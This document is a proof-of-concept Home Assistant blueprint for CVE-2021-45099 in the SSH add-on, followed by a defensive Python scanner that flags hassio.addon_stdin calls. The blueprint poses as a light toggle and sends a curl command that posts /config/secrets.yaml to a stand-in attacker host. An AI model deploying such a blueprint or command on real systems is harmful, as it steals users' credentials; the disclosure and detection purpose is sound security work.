PoC for github.com/hassio-addons/addon-ssh <= 9.1.1 - CVE-2021-45099
blueprint:
  name: PoC for CVE-2021-45099
  description: the not-a-vulnerability was patched in github.com/hassio-addons/addon-ssh v10.0.0
  domain: automation
  input:
    boolean:
      name: Toggle
      description: Some boolean light switch.
      selector:
        entity:
          domain: light
# Fires on any state change of the light entity chosen at import time.
trigger:
  - platform: state
    entity_id: !input boolean
# Sends the string below to the SSH add-on's stdin through the Supervisor service.
action:
  service: hassio.addon_stdin
  data:
    addon: a0d7b954_ssh
    input: 'curl -X POST --data-binary "@/config/secrets.yaml" http://evil.example'
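
A defender-side check for the pattern this PoC relies on, as an added example that is not part of the original gist: it scans blueprint or automation YAML text for calls to `hassio.addon_stdin` and reports the target add-on and the string sent to it, so a blueprint can be reviewed before import. The function names and the sample fragment are assumptions constructed for illustration.

```python
import re
import sys

# Matches a step that calls the Supervisor stdin service; newer Home Assistant
# releases also accept "action:" in place of "service:" for the call name.
CALL = re.compile(r"""^[\s-]*(?:service|action)\s*:\s*['"]?hassio\.addon_stdin['"]?\s*(?:#.*)?$""")
FIELD = re.compile(r"^\s*(addon|input)\s*:\s*(.*?)\s*$")

# Constructed sample blueprint fragment (harmless command, slug taken from the PoC).
SAMPLE = """\
action:
  - service: hassio.addon_stdin
    data:
      addon: a0d7b954_ssh
      input: 'echo constructed-sample'
  - service: light.turn_on
    data:
      input: not-part-of-the-stdin-call
"""

def _unquote(value):
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value

def find_stdin_calls(text):
    """Return one finding per hassio.addon_stdin call: line number, add-on slug, input."""
    lines = text.splitlines()
    findings = []
    for i, line in enumerate(lines):
        if not CALL.match(line):
            continue
        col = len(line) - len(line.lstrip(" -"))  # column of the key, past any "- "
        hit = {"line": i + 1, "addon": None, "input": None}
        # Scan forward through this step only (assumes data: follows the call name).
        for nxt in lines[i + 1:]:
            if nxt.strip() and len(nxt) - len(nxt.lstrip(" ")) < col:
                break
            m = FIELD.match(nxt)
            if m and hit[m.group(1)] is None:
                hit[m.group(1)] = _unquote(m.group(2))
        findings.append(hit)
    return findings

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8") as fh:
            for f in find_stdin_calls(fh.read()):
                print(f"{path}:{f['line']}: stdin -> {f['addon']}: {f['input']}")
```

Run it with one or more blueprint file paths as arguments; any line it prints is a step worth reading by hand before the blueprint is imported.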